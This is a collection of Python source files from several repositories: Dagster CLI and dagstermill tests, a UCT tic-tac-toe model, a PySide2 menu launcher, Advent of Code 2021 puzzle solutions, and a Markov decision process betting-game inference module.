result_data = json.loads(result.output.strip('\n').split('\n')[-1])
if not result_data.get('data'):
raise Exception(result_data)
assert (
result_data['data']['launchPipelineExecution']['__typename']
== 'LaunchPipelineRunSuccess'
)
def test_logs_in_start_execution_predefined():
variables = seven.json.dumps(
{
'executionParams': {
'selector': {
'repositoryLocationName': '<<in_process>>',
'repositoryName': 'test',
'pipelineName': 'math',
},
'runConfigData': {'solids': {'add_one': {'inputs': {'num': {'value': 123}}}}},
'mode': 'default',
}
}
)
workspace_path = file_relative_path(__file__, './cli_test_workspace.yaml')
with seven.TemporaryDirectory() as temp_dir:
instance = DagsterInstance.local_temp(temp_dir)
runner = CliRunner(env={'DAGSTER_HOME': temp_dir})
result = runner.invoke(
ui, ['-w', workspace_path, '-v', variables, '-p', 'launchPipelineExecution']
)
assert result.exit_code == 0
result_data = json.loads(result.output.strip('\n').split('\n')[-1])
assert (
result_data['data']['launchPipelineExecution']['__typename']
== 'LaunchPipelineRunSuccess'
)
run_id = result_data['data']['launchPipelineExecution']['run']['runId']
# allow FS events to flush
retries = 5
while retries != 0 and not _is_done(instance, run_id):
time.sleep(0.333)
retries -= 1
# assert that the watching run storage captured the run correctly from the other process
run = instance.get_run_by_id(run_id)
assert run.status == PipelineRunStatus.SUCCESS
def _is_done(instance, run_id):
return instance.has_run(run_id) and instance.get_run_by_id(run_id).is_finished
```
#### File: dagstermill/dagstermill_tests/test_context.py
```python
from dagstermill.manager import MANAGER_FOR_NOTEBOOK_INSTANCE
from dagster import SolidDefinition
from dagster.core.definitions.dependency import Solid
from dagster.core.system_config.objects import EnvironmentConfig
BARE_OUT_OF_PIPELINE_CONTEXT = MANAGER_FOR_NOTEBOOK_INSTANCE.get_context()
def test_tags():
context = BARE_OUT_OF_PIPELINE_CONTEXT
assert not context.has_tag('foo')
assert context.get_tag('foo') is None
def test_run_id():
assert BARE_OUT_OF_PIPELINE_CONTEXT.run_id is not None
assert BARE_OUT_OF_PIPELINE_CONTEXT.pipeline_run.run_id == BARE_OUT_OF_PIPELINE_CONTEXT.run_id
def test_run_config():
assert BARE_OUT_OF_PIPELINE_CONTEXT.run_config == {'loggers': {'dagstermill': {}}}
def test_logging_tags():
assert BARE_OUT_OF_PIPELINE_CONTEXT.logging_tags['pipeline'] == 'ephemeral_dagstermill_pipeline'
def test_environment_config():
assert isinstance(BARE_OUT_OF_PIPELINE_CONTEXT.environment_config, EnvironmentConfig)
def test_pipeline_def():
assert BARE_OUT_OF_PIPELINE_CONTEXT.pipeline_def.name == 'ephemeral_dagstermill_pipeline'
assert len(BARE_OUT_OF_PIPELINE_CONTEXT.pipeline_def.solids) == 1
assert BARE_OUT_OF_PIPELINE_CONTEXT.pipeline_def.solids[0].name == 'this_solid'
def test_resources():
assert isinstance(BARE_OUT_OF_PIPELINE_CONTEXT.resources, tuple)
def test_solid_def():
assert isinstance(BARE_OUT_OF_PIPELINE_CONTEXT.solid_def, SolidDefinition)
def test_solid():
assert isinstance(BARE_OUT_OF_PIPELINE_CONTEXT.solid, Solid)
def test_log(capsys):
BARE_OUT_OF_PIPELINE_CONTEXT.log.info('Ho ho!')
assert 'Ho ho!' in capsys.readouterr().err
``` |
{
"source": "JoeyFTribbiani/Beta-TicTacToe",
"score": 3
} |
#### File: JoeyFTribbiani/Beta-TicTacToe/model.py
```python
import numpy as np
import collections
class UCT_Model_Node(object):
def __init__(self, w, n):
self.win = w
self.n = n
class UCT_Model(object):
def __init__(self, init_w=0.5, init_n=1):
self.nodes = collections.defaultdict(lambda: UCT_Model_Node(init_w,init_n))
def evaluate_and_select(self, moves, using_ucb=True, c=1.414):
'''
params:
nodes: List
return:
the node who has the max ucb value
'''
nodes = [self.nodes[move] for move in moves]
N = sum(node.n for node in nodes)
if not using_ucb:
win_rates = [node.win*1.0/node.n for node in nodes]
index = win_rates.index(max(win_rates))
return moves[index]
ucb_vals =[self._ucb(node.win, node.n, N, c) for node in nodes]
total_val = sum(ucb_vals)
p = [v*1.0/total_val for v in ucb_vals]
index = ucb_vals.index(max(ucb_vals))
return moves[index]
def update(self, node, res):
node.win += res
node.n += 1
def _ucb(self, win, n, N, c):
return win * 1.0 / n + c * ((np.log(N)/n) ** 0.5) + 10 * (n<=5)
def reset(self):
self.nodes.clear()
``` |
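A short, hypothetical interaction with the model above; the move labels are arbitrary and the module name is assumed from the file path:
```python
# Illustrative only; assumes the class is importable from model.py.
from model import UCT_Model

model = UCT_Model()
moves = ['a1', 'b2', 'c3']
chosen = model.evaluate_and_select(moves)            # UCB1-style selection over the moves
model.update(model.nodes[chosen], res=1)             # record a win for the chosen move
greedy = model.evaluate_and_select(moves, using_ucb=False)  # pick by raw win rate instead
```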
{
"source": "JoeyGaojingxing/QtLearn",
"score": 2
} |
#### File: JoeyGaojingxing/QtLearn/start.py
```python
import sys
from PySide2 import QtCore, QtGui
from PySide2.QtWidgets import QMainWindow, QApplication, QWidget
from UI.ui_main import Ui_MainWindow
from app import JosephusCircleWindow, NinePatchWindow, AStarWindow
"""
beauty the GUI, such as backgrounds, layouts, window icon.
TODO: add global error handling, raise warnings when raise a error
"""
try:
# Python v2.
unicode
def encode_utf8(ba):
return unicode(ba, encoding='utf8')
def decode_utf8(qs):
return QtCore.QByteArray(str(qs))
except NameError:
# Python v3.
def encode_utf8(ba):
return str(ba.data(), encoding='utf8')
def decode_utf8(qs):
return QtCore.QByteArray(bytes(qs, encoding='utf8'))
class MainWindow(QMainWindow, Ui_MainWindow):
def __init__(self):
QMainWindow.__init__(self)
self.setupUi(self)
self.JosephusCircleButton.clicked.connect(self.click_josephus_circle)
self.josephus_circle = JosephusCircleWindow(self)
self.NinePatchButton.clicked.connect(self.click_nine_patch)
self.nine_patch = NinePatchWindow(self)
self.AStarButton.clicked.connect(self.click_a_star)
self.a_star = AStarWindow(self)
@QtCore.Slot()
def click_a_star(self):
self.a_star.setStyleSheet(open(r"UI\base.qss", "r", encoding='utf-8').read())
self.a_star.show()
self.hide()
@QtCore.Slot()
def click_josephus_circle(self):
self.josephus_circle.setStyleSheet(open(r"UI\base.qss", "r", encoding='utf-8').read())
self.josephus_circle.show()
self.hide()
@QtCore.Slot()
def click_nine_patch(self):
self.nine_patch.setStyleSheet(open(r"UI\base.qss", "r", encoding='utf-8').read())
self.nine_patch.show()
self.hide()
if __name__ == '__main__':
app = QApplication(sys.argv)
window = MainWindow()
window.setStyleSheet(open(r"UI\base.qss", "r", encoding='utf-8').read())
try:
window.show()
sys.exit(app.exec_())
except:
pass
``` |
{
"source": "joeygibson/adventofcode2021",
"score": 3
} |
#### File: adventofcode2021/day02/main.py
```python
import sys
from functools import reduce
from typing import Callable
def partition(lst: list[str], pred: Callable[[str], bool]) -> (list[str], list[str]):
return reduce(lambda x, y: x[pred(y)].append(y) or x, lst, ([], []))
def part1(lst: list) -> int:
horiz_ops, vert_ops = partition(lst, lambda x: x[0] != 'forward')
print(f'h: {horiz_ops}')
print(f'v: {vert_ops}')
horizontal = sum([int(x[1]) for x in horiz_ops])
vertical = sum([int(x[1]) if x[0] == 'down' else -int(x[1]) for x in vert_ops])
return horizontal * vertical
def part2(lst: list) -> int:
pos = 0
depth = 0
aim = 0
for op, val in lst:
val = int(val)
if op == 'forward':
pos += val
depth += aim * val
elif op == 'up':
aim -= val
else:
aim += val
return depth * pos
def get_data(path):
with open(path) as f:
return [x.strip().split() for x in f.readlines() if x.strip()]
if __name__ == '__main__':
if len(sys.argv) == 1:
print('Usage: main.py #')
sys.exit(1)
lines = get_data(sys.argv[1])
r1 = part1(lines)
r2 = part2(lines)
print(f'part 1: {r1}')
print(f'part 2: {r2}')
```
#### File: adventofcode2021/day05/main.py
```python
import itertools
import sys
def find_clouds(lst: list) -> int:
xs = [int(x[0][0]) for x in lst] + [int(x[1][0]) for x in lst]
max_x = max(xs)
ys = [int(x[0][1]) for x in lst] + [int(x[1][1]) for x in lst]
max_y = max(ys)
sea_map = {}
for x in range(0, max_x + 1):
for y in range(0, max_y + 1):
sea_map[(x, y)] = '.'
for a, b in lst:
x_step = 1 if a[0] < b[0] else -1
y_step = 1 if a[1] < b[1] else -1
if a[0] == b[0]:
fill_value = a[0]
elif a[1] == b[1]:
fill_value = a[1]
else:
fill_value = None
co = itertools.zip_longest(range(a[0], b[0] + x_step, x_step), range(a[1], b[1] + y_step, y_step),
fillvalue=fill_value)
for pair in co:
if sea_map[pair] == '.':
sea_map[pair] = 1
else:
sea_map[pair] += 1
return len(list(filter(lambda v: v != '.' and v > 1, sea_map.values())))
def get_data(path) -> list:
with open(path) as f:
raw = [x.strip().split(' -> ') for x in f.readlines() if x.strip()]
return [[list(map(int, x[0].split(','))), list(map(int, x[1].split(',')))] for x in raw]
if __name__ == '__main__':
if len(sys.argv) == 1:
print('Usage: main.py #')
sys.exit(1)
lines = get_data(sys.argv[1])
r1 = find_clouds(list(filter(lambda x: x[0][0] == x[1][0] or x[0][1] == x[1][1], lines)))
r2 = find_clouds(lines)
print(f'part 1: {r1}')
print(f'part 2: {r2}')
```
#### File: adventofcode2021/day07/main.py
```python
import sys
from functools import reduce
def get_data(path) -> list:
with open(path) as f:
return [int(x) for x in f.read().strip().split(',')]
def part1(lst: list[int]) -> int:
least_fuel = sys.maxsize
for pos in lst:
fuel = reduce(lambda acc, x: acc + abs(x - pos), lst, 0)
if fuel < least_fuel:
least_fuel = fuel
return least_fuel
def part2(lst: list[int]) -> int:
least_fuel = sys.maxsize
for pos in range(0, max(lst)):
fuel = reduce(lambda acc, x: acc + step_mul(abs(x - pos)), lst, 0)
if fuel < least_fuel:
least_fuel = fuel
return least_fuel
def step_mul(steps: int) -> int:
return int((steps ** 2 + steps) / 2)
if __name__ == '__main__':
if len(sys.argv) < 2:
print('Usage: main.py #')
sys.exit(1)
file_name = sys.argv[1]
print(f'part 1: {part1(get_data(file_name))}')
print(f'part 2: {part2(get_data(file_name))}')
```
#### File: adventofcode2021/day09/main.py
```python
import functools
import itertools
import sys
from typing import Tuple
def is_low_point(sea_floor_map: dict, point: Tuple[int, int]) -> bool:
point_depth = sea_floor_map[point]
x, y = point
neighbors = [(x - 1, y), (x + 1, y), (x, y - 1), (x, y + 1)]
depths = [sea_floor_map.get(n) for n in neighbors]
valid_depths = list(filter(lambda d: d is not None, depths))
low_points = list(filter(lambda d: d <= point_depth, valid_depths))
return len(low_points) == 0
def part1(sea_floor_map: dict) -> int:
low_points = []
for k, v in sea_floor_map.items():
if is_low_point(sea_floor_map, k):
low_points.append(v)
return sum([x + 1 for x in low_points])
# , width: int, height: int
def get_neighbors(point: Tuple) -> list[Tuple]:
x, y = point
# return [(x - 1, y), (x + 1, y), (x, y - 1), (x, y + 1)]
return [(x, y - 1), (x - 1, y), (x, y + 1), (x + 1, y)]
# return list(filter(lambda p: 0 <= p[0] <= width and 0 <= p[1] <= height, tmp))
def filter_not_nines(sea_floor_map: dict, points: list[Tuple]) -> list[Tuple]:
return list(set([p for p in points if sea_floor_map.get(p) is not None and sea_floor_map.get(p) != 9]))
# def part2(sea_floor_map: dict) -> int:
# basins = []
# max_pos = max(sea_floor_map.keys())
#
# for point in [x[0] for x in sea_floor_map.items() if x[1] != 9]:
# neighbors = filter_not_nines(sea_floor_map, get_neighbors(point, *max_pos))
# added = False
#
# for basin in basins:
# if any([x in basin for x in neighbors]):
# added = True
# basin.append(point)
# break
#
# if not added:
# n2 = filter_not_nines(sea_floor_map,
# list(itertools.chain(*[get_neighbors(n, *max_pos) for n in neighbors])))
#
# for basin in basins:
# if any([x in basin for x in n2]):
# added = True
# basin.append(point)
# break
#
# if not added:
# basins.append([point])
#
# for basin in basins:
# print(basin)
#
# print(f'basins count {len(basins)}')
#
# sizes = list(reversed(sorted([len(basin) for basin in basins])))
# print(f'sizes: {sizes}')
# print(f'picks: {sizes[0:3]}')
# return functools.reduce(lambda acc, n: acc * n, sizes[0:3], 1)
def part2(sea_floor_map: dict) -> int:
big_basins = [0, 0, 0]
for key in list(sea_floor_map.keys()):
point = sea_floor_map.get(key)
tmp = explore(sea_floor_map, point)
basin = len(set(tmp))
if big_basins[0] < basin:
big_basins = big_basins[1:3]
big_basins.append(basin)
big_basins = sorted(big_basins)
print(f'big_basins {big_basins}')
return functools.reduce(lambda acc, n: acc * n, big_basins, 1)
def explore(filtered_map, point, basin=None) -> list:
    # A mutable default ([]) would be shared across top-level calls and accumulate
    # points from previously explored basins; use None and create a fresh list instead.
    if basin is None:
        basin = []
    if point is None:
        return basin
    del filtered_map[point]
    basin.append(point)
    res = [explore(filtered_map, filtered_map.get(n), basin) for n in get_neighbors(point)]
    return list(itertools.chain(*res))
def get_data(path) -> dict:
data = {}
with open(path) as f:
lines = [x.strip() for x in f.readlines() if x.strip()]
for i, row in enumerate(lines):
for j, val in enumerate(row):
if val != '9':
data[(j, i)] = (j, i)
# data[(j, i)] = int(val)
return data
if __name__ == '__main__':
if len(sys.argv) < 2:
print('Usage: main.py #')
sys.exit(1)
file_name = sys.argv[1]
data = get_data(file_name)
print(data)
# print(f'part 1: {part1(get_data(file_name))}')
print(f'part 2: {part2(get_data(file_name))}')
```
#### File: adventofcode2021/day12/main.py
```python
import sys
from collections import Counter
class Cave:
def __init__(self, name: str):
self.name = name.upper() if name in ['start', 'end'] else name
self.links = {}
def __str__(self):
return f'{self.name}'
def __repr__(self):
return self.__str__()
def __eq__(self, other):
return self.name == other.name
def __hash__(self):
return self.name.__hash__()
def add(self, other: 'Cave'):
self.links[other] = other
def is_start(self) -> bool:
return self.name == 'START'
def is_end(self) -> bool:
return self.name == 'END'
def is_small(self) -> bool:
return self.name.islower()
def get_data(path) -> Cave:
with open(path) as f:
lines = [x.strip() for x in f.readlines() if x.strip()]
caves = {}
start = None
for a, b in [x.split('-') for x in lines]:
if a not in caves:
a_cave = Cave(a)
if a == 'start':
start = a_cave
else:
a_cave = caves[a]
if b not in caves:
b_cave = Cave(b)
if b == 'start':
start = b_cave
else:
b_cave = caves[b]
a_cave.add(b_cave)
b_cave.add(a_cave)
caves[a] = a_cave
caves[b] = b_cave
return start
def part1(start: Cave) -> int:
return len(walk(start, [start], False))
def part2(start: Cave) -> int:
return len(walk(start, [start], True))
def walk(start_at: Cave, path: list[Cave], allow_multiple: bool) -> list[list[Cave]]:
if start_at.is_end():
return [path]
paths = []
for cave in start_at.links:
if cave.is_start():
continue
if cave.is_small() and cave in path:
if allow_multiple:
small_counts = Counter(list(filter(lambda x: x.is_small(), path)))
multiple_small_visits = any([c > 1 for c in small_counts.values()])
if multiple_small_visits:
continue
else:
continue
tmp_path = list([x for x in path])
tmp_path.append(cave)
paths += walk(cave, tmp_path, allow_multiple)
return paths
if __name__ == '__main__':
if len(sys.argv) < 2:
print('Usage: main.py #')
sys.exit(1)
file_name = sys.argv[1]
print(f'part1 {part1(get_data(file_name))}')
print(f'part2 {part2(get_data(file_name))}')
```
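A tiny hand-built cave system can exercise `walk` directly, assuming the classes above are importable (e.g. as `main` when run from the day12 directory):
```python
# Hypothetical import path; builds a minimal start-A-b-end cave system.
from main import Cave, walk

start, a, b, end = Cave('start'), Cave('A'), Cave('b'), Cave('end')
for x, y in [(start, a), (start, b), (a, b), (a, end), (b, end)]:
    x.add(y)
    y.add(x)

print(len(walk(start, [start], False)))  # paths visiting each small cave at most once
print(len(walk(start, [start], True)))   # paths where one small cave may be visited twice
```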
#### File: adventofcode2021/day14/main.py
```python
import itertools
import sys
from collections import Counter, defaultdict
from typing import Tuple
def get_data(path) -> (list[str], dict[str, str]):
with open(path) as f:
lines = f.readlines()
template = [c for c in lines[0].strip()]
rules = {}
for line in itertools.dropwhile(lambda x: '->' not in x, lines):
splits = line.strip().split(' -> ')
rules[splits[0].strip()] = splits[1].strip()
return template, rules
def partition(lst: list, n: int) -> Tuple:
for i in range(0, len(lst) - 1):
a = lst[i]
b = lst[i + 1]
yield a, b
def combine(template: list[str], rules: dict[str, str], iterations: int = 10) -> int:
pairs = Counter()
for pair in partition(template, 1):
pairs[pair] = 1
for i in range(iterations):
print(f'iteration {i + 1}')
next_pairs = Counter()
for (a, b), tally in pairs.items():
i = rules[''.join([a, b])]
next_pairs[(a, i)] += tally
next_pairs[(i, b)] += tally
pairs = next_pairs
totals = defaultdict(lambda: 0)
for (a, b), tally in pairs.items():
totals[a] += tally
totals[template[-1]] += 1
min_val = min(totals.values())
max_val = max(totals.values())
return max_val - min_val
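# Hedged worked example of the pair-expansion loop above (hypothetical rules):
#   template "NNB" with rules {"NN": "C", "NB": "C"} starts as pairs {(N,N): 1, (N,B): 1};
#   one iteration yields {(N,C): 2, (C,N): 1, (C,B): 1}, i.e. the string "NCNCB", and the
#   letter totals are read from the first element of every pair plus the final "B".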
def part1(template: list[str], rules: dict[str, str]) -> int:
return combine(template, rules)
def part2(template: list[str], rules: dict[str, str]) -> int:
return combine(template, rules, 40)
if __name__ == '__main__':
if len(sys.argv) < 2:
print('Usage: main.py #')
sys.exit(1)
file_name = sys.argv[1]
print(f'part1 {part1(*get_data(file_name))}')
print()
print(f'part2 {part2(*get_data(file_name))}')
```
#### File: adventofcode2021/day15/main.py
```python
import sys
from collections import defaultdict
from copy import deepcopy
from typing import Tuple, Dict
Pair = Tuple[int, int]
class Graph:
def __init__(self, the_map):
self.nodes = set()
self.distances = the_map
def addNode(self, value):
self.nodes.add(value)
def edges(self, node):
x, y = node
neighbors = [(x, y + 1), (x + 1, y), (x, y - 1), (x - 1, y)]
return [n for n in neighbors if self.distances.get(n) is not None]
def get_data(path) -> dict[Pair, int]:
with open(path) as f:
lines = f.readlines()
the_map = {}
for j, row in enumerate(lines):
for i, val in enumerate(row.strip()):
the_map[(i, j)] = int(val)
return the_map
def get_exploded_data(path) -> Dict[Pair, int]:
with open(path) as f:
lines = [line.strip() for line in f.readlines() if line.strip()]
cols = len(lines[0].strip())
rows = len(lines)
raw_map = [[0 for col in range(cols)] for row in range(rows)]
for j, row in enumerate(lines):
for i, val in enumerate(row.strip()):
raw_map[j][i] = int(val)
for row_num, row in enumerate(raw_map):
new_row = deepcopy(row)
current_vals = new_row
for i in range(4):
new_cols = [x + 1 if x + 1 <= 9 else 1 for x in current_vals]
new_row += new_cols
current_vals = new_cols
raw_map[row_num] = new_row
new_map = deepcopy(raw_map)
current_map = deepcopy(new_map)
for i in range(4):
tmp_map = []
for row in current_map:
new_row = [x + 1 if x + 1 <= 9 else 1 for x in row]
tmp_map.append(new_row)
new_map += tmp_map
current_map = tmp_map
the_map = {}
for j, row in enumerate(new_map):
for i, val in enumerate(row):
the_map[(i, j)] = val
print('map created')
return the_map
def dijkstra(graph, initial, goal):
visited = {initial: 0}
path = defaultdict(list)
nodes = set(graph.nodes)
while nodes:
minNode = None
for node in nodes:
if node in visited:
if minNode is None:
minNode = node
elif visited[node] < visited[minNode]:
minNode = node
if minNode is None:
break
nodes.remove(minNode)
currentWeight = visited[minNode]
for edge in graph.edges(minNode):
weight = currentWeight + graph.distances[edge]
if edge not in visited or weight < visited[edge]:
visited[edge] = weight
path[edge].append(minNode)
return visited[goal]
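# Hedged usage sketch (hypothetical 2x2 risk map, not part of any puzzle input):
#   tiny_map = {(0, 0): 1, (1, 0): 2, (0, 1): 5, (1, 1): 1}
#   g = Graph(tiny_map)
#   for node in tiny_map:
#       g.addNode(node)
#   dijkstra(g, (0, 0), (1, 1))  # -> 3: enter (1, 0) for 2, then (1, 1) for 1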
def part1(the_map: dict[Pair, int]) -> int:
g = Graph(the_map)
for node in the_map.keys():
g.addNode(node)
return dijkstra(g, min(the_map.keys()), max(the_map.keys()))
if __name__ == '__main__':
if len(sys.argv) < 2:
print('Usage: main.py #')
sys.exit(1)
file_name = sys.argv[1]
# print(f'part1 {part1(get_data(file_name))}')
print()
print(f'part2 {part1(get_exploded_data(file_name))}')
``` |
{
"source": "joeyginorio/compositional_desires",
"score": 3
} |
#### File: compositional_desires/model_src/mdp.py
```python
import matplotlib as mpl
mpl.use('Agg')
import matplotlib.pyplot as plt
import numpy as np
import random
import pyprind
from scipy.stats import beta
from scipy.stats import expon
from scipy.stats import uniform
from abc import ABCMeta
from abc import abstractmethod
class MDP(object):
"""
    Defines a Markov Decision Process containing:
- States, s
- Actions, a
- Rewards, r(s,a)
- Transition Matrix, t(s,a,_s)
    Includes a set of abstract methods that an extending class will
    need to implement.
"""
__metaclass__ = ABCMeta
def __init__(self, states=None, actions=None, rewards=None, transitions=None,
discount=.999, tau=.01, epsilon=.01):
self.s = np.array(states)
self.a = np.array(actions)
self.r = np.array(rewards)
self.t = np.array(transitions)
self.discount = discount
self.tau = tau
self.epsilon = epsilon
# Value iteration will update this
self.values = None
self.policy = None
@abstractmethod
def isTerminal(self, state):
"""
Checks if MDP is in terminal state.
"""
raise NotImplementedError()
def getTransitionStatesAndProbs(self, state, action):
"""
Returns the list of transition probabilities
"""
return self.t[state][action][:]
def getReward(self, state, action, nextState):
"""
Gets reward for transition from state->action->nextState.
"""
return self.r[state][action][nextState]
def takeAction(self, state, action):
"""
Take an action in an MDP, return the next state
Chooses according to probability distribution of state transitions,
contingent on actions.
"""
return np.random.choice(self.s, p=self.getTransitionStatesAndProbs(state, action))
def valueIteration(self):
"""
Performs value iteration to populate the values of all states in
the MDP.
Params:
- epsilon: Determines limit of convergence
"""
# Initialize V_0 to zero
self.values = np.zeros(len(self.s))
self.policy = np.zeros([len(self.s), len(self.a)])
policy_switch = 0
# Loop until convergence
while True:
# oldPolicy = np.argmax(self.policy, axis=1)
# self.extractPolicy()
# newPolicy = np.argmax(self.policy, axis=1)
# if not np.array_equal(oldPolicy, newPolicy):
# policy_switch += 1
# print "Policy switch count: {}".format(policy_switch)
# To be used for convergence check
oldValues = np.copy(self.values)
for i in range(len(self.s)-1):
self.values[i] = np.max(self.r[i] + self.discount * \
np.dot(self.t[i][:][:], self.values))
# print "Convergence Measure: {}".format(np.max(np.abs(self.values - oldValues)))
# print "-------------------------------------"
# Check Convergence
if np.max(np.abs(self.values - oldValues)) <= self.epsilon:
break
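        # Hedged reading of the update above: with r indexed per state (as in BettingGame),
        # each sweep applies the Bellman backup
        #   V(s) <- max_a [ r(s) + discount * sum_s' t(s, a, s') * V(s') ]
        # and the loop stops once the largest change across states drops below epsilon.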
def extractPolicy(self):
"""
Extract policy from values after value iteration runs.
"""
self.policy = np.zeros([len(self.s),len(self.a)])
self.logpolicy = np.zeros([len(self.s),len(self.a)])
for i in range(len(self.s)-1):
state_policy = np.zeros(len(self.a))
state_policy = self.r[i] + self.discount* \
np.dot(self.t[i][:][:], self.values)
# Softmax the policy
# state_policy -= np.max(state_policy)
# state_policy = np.exp(state_policy / float(self.tau))
# state_policy /= state_policy.sum()
state_policy /= self.tau
maxVal = max(state_policy)
arg = maxVal + np.log((np.exp(state_policy - maxVal).sum()))
state_policy -= arg
self.logpolicy[i] = state_policy
state_policy = np.exp(state_policy)
if self.tau > 100:
state_policy = np.ones(len(state_policy))
state_policy /= len(state_policy)
self.policy[i] = state_policy
def extractDeterministicPolicy(self):
"""
Extract policy from values after value iteration runs.
"""
self.policy = np.zeros(len(self.s))
for i in range(len(self.s)-1):
# Take max over all possible actions in state
max_a = 0
for j in range(len(self.a)):
# Account for all possible states a particular action can take you to
sum_nextState = 0
for k in range(len(self.s)-1):
sum_nextState += self.getTransitionStatesAndProbs(i,j)[k] * \
(self.getReward(i,j,k) + self.discount*self.values[k])
if sum_nextState > max_a:
max_a = sum_nextState
self.policy[i] = j
def simulate(self, state):
"""
Runs the solver for the MDP, conducts value iteration, extracts policy,
then runs simulation of problem.
NOTE: Be sure to run value iteration (solve values for states) and to
extract some policy (fill in policy vector) before running simulation
"""
# Run simulation using policy until terminal condition met
while not self.isTerminal(state):
# Determine which policy to use (non-deterministic)
policy = self.policy[np.where(self.s == state)[0][0]]
p_policy = self.policy[np.where(self.s == state)[0][0]] / \
self.policy[np.where(self.s == state)[0][0]].sum()
# Get the parameters to perform one move
stateIndex = np.where(self.s == state)[0][0]
policyChoice = np.random.choice(policy, p=p_policy)
actionIndex = np.random.choice(np.array(np.where(self.policy[state][:] == policyChoice)).ravel())
# Take an action, move to next state
nextState = self.takeAction(stateIndex, actionIndex)
print "In state: {}, taking action: {}, moving to state: {}".format(
state, self.a[actionIndex], nextState)
# End game if terminal state reached
state = int(nextState)
if self.isTerminal(state):
# print "Terminal state: {} has been reached. Simulation over.".format(state)
return state
class BettingGame(MDP):
"""
Defines the Betting Game:
Problem: A gambler has the chance to make bets on the outcome of
a fair coin flip. If the coin is heads, the gambler wins as many
dollars back as was staked on that particular flip - otherwise
the money is lost. The game is won if the gambler obtains $100,
and is lost if the gambler runs out of money (has 0$). This gambler
did some research on MDPs and has decided to enlist them to assist
in determination of how much money should be bet on each turn. Your
task is to build that MDP!
Params:
startCash: Starting amount to bet with
        pHeads: Probability of coin flip landing on heads
- Use .5 for fair coin, else choose a bias [0,1]
"""
def __init__(self, pHeads=.5, discount=.99, epsilon=.1, tau=.001):
MDP.__init__(self,discount=discount,tau=tau,epsilon=epsilon)
self.pHeads = pHeads
self.setBettingGame(pHeads)
self.valueIteration()
self.extractPolicy()
def isTerminal(self, state):
"""
Checks if MDP is in terminal state.
"""
        return state == 100 or state == 0
def setBettingGame(self, pHeads=.5):
"""
Initializes the MDP to the starting conditions for
the betting game.
Params:
startCash = Amount of starting money to spend
pHeads = Probability that coin lands on head
- .5 for fair coin, otherwise choose bias
"""
# This is how much we're starting with
self.pHeads = pHeads
# Initialize all possible states
self.s = np.arange(102)
# Initialize possible actions
self.a = np.arange(101)
# Initialize rewards
self.r = np.zeros(101)
self.r[0] = -5
self.r[100] = 10
# Initialize transition matrix
temp = np.zeros([len(self.s),len(self.a),len(self.s)])
# List comprehension using tHelper to determine probabilities for each index
self.t = [self.tHelper(i[0], i[1], i[2], self.pHeads) for i,x in np.ndenumerate(temp)]
self.t = np.reshape(self.t, np.shape(temp))
for x in range(len(self.a)):
        # Remember to add -1 to value iteration and policy extraction
# Send the end game states to the death state!
self.t[100][x] = np.zeros(len(self.s))
self.t[100][x][101] = 1.0
self.t[0][x] = np.zeros(len(self.s))
self.t[0][x][101] = 1.0
def tHelper(self, x, y, z , pHeads):
"""
Helper function to be used in a list comprehension to quickly
generate the transition matrix. Encodes the necessary conditions
to compute the necessary probabilities.
Params:
x,y,z indices
pHeads = probability coin lands on heads
"""
        # If you bet no money, you will always have original amount
        if x + y == z and y == 0:
            return 1.0
        # If you bet more money than you have, no chance of any outcome
        elif y > x and x != z:
            return 0
        # If you bet more money than you have, returns same state with 1.0 prob.
        elif y > x and x == z:
            return 1.0
        # Chance you lose
        elif x - y == z:
            return 1.0 - pHeads
        # Chance you win
        elif x + y == z:
            return pHeads
        # Edge Case: Chance you win, and winnings go over 100
        elif x + y > z and z == 100:
            return pHeads
        else:
            return 0
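    # Hedged usage sketch (not part of the original script; construction already runs
    # value iteration and extracts the soft-max policy):
    #   game = BettingGame(pHeads=0.6)
    #   game.policy[50]     # action distribution when holding $50
    #   game.simulate(50)   # play one episode starting from $50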
class InferenceMachine():
"""
Conducts inference via MDPs for the BettingGame.
"""
def __init__(self):
self.sims = list()
self.likelihood = None
self.posterior = None
self.prior = None
self.e = None
self.buildBiasEngine()
def inferSummary(self, state, action):
self.inferLikelihood(state, action)
self.inferPosterior(state, action)
print "Expected Value of Posterior Distribution: {}".format(
self.expectedPosterior())
self.plotDistributions()
def buildBiasEngine(self):
"""
Simulates MDPs with varying bias to build a bias inference engine.
"""
print "Loading MDPs...\n"
# Unnecessary progress bar for terminal
bar = pyprind.ProgBar(len(np.arange(0,1.01,.01)))
for i in np.arange(0,1.01,.01):
self.sims.append(BettingGame(i))
bar.update()
print "\nDone loading MDPs..."
def inferLikelihood(self, state, action):
"""
        Uses the inference engine to infer bias based on an agent's
        actions and current state.
"""
self.state = state
self.action = action
self.likelihood = list()
for i in range(len(self.sims)):
self.likelihood.append(self.sims[i].policy[state][action])
def inferPosterior(self, state, action):
"""
Uses inference engine to compute posterior probability from the
likelihood and prior (beta distribution).
"""
# Beta Distribution
# self.prior = np.linspace(.01,1.0,101)
# self.prior = beta.pdf(self.prior,1.4,1.4)
# self.prior /= self.prior.sum()
# Shifted Exponential
# self.prior = np.zeros(101)
# for i in range(50):
# self.prior[i + 50] = i * .02
# self.prior[100] = 1.0
# self.prior = expon.pdf(self.prior)
# self.prior[0:51] = 0
# self.prior *= self.prior
# self.prior /= self.prior.sum()
# # Shifted Beta
# self.prior = np.linspace(.01,1.0,101)
# self.prior = beta.pdf(self.prior,1.2,1.2)
# self.prior /= self.prior.sum()
# self.prior[0:51] = 0
# Uniform
self.prior = np.linspace(.01,1.0,101)
self.prior = uniform.pdf(self.prior)
self.prior /= self.prior.sum()
self.prior[0:51] = 0
self.posterior = self.likelihood * self.prior
self.posterior /= self.posterior.sum()
def plotDistributions(self):
# Plotting Posterior
plt.figure(1)
plt.subplot(221)
plt.plot(np.linspace(.01,1.0,101), self.posterior)
plt.ylabel('P(Action={}|State={})'.format(self.action, self.state))
plt.xlabel('Bias')
plt.title('Posterior Probability for Bias')
# Plotting Likelihood
plt.subplot(222)
plt.plot(np.linspace(.01,1.0,101),self.likelihood)
plt.ylabel('P(Action={}|State={})'.format(self.action,self.state))
plt.xlabel('Bias')
plt.title('Likelihood for Actions, States')
# Plotting Prior
plt.subplot(223)
plt.plot(np.linspace(.01,1.0,101), self.prior)
plt.ylabel('P(Bias)')
plt.xlabel('Bias')
plt.title('Prior Probability')
plt.tight_layout()
# plt.show()
def expectedPosterior(self):
"""
Calculates expected value for the posterior distribution.
"""
expectation = 0
x = np.linspace(.01,1.0,101)
for i in range(len(self.posterior)):
expectation += self.posterior[i] * x[i]
return expectation
# infer = InferenceMachine()
"""
(.8 discount expected values)
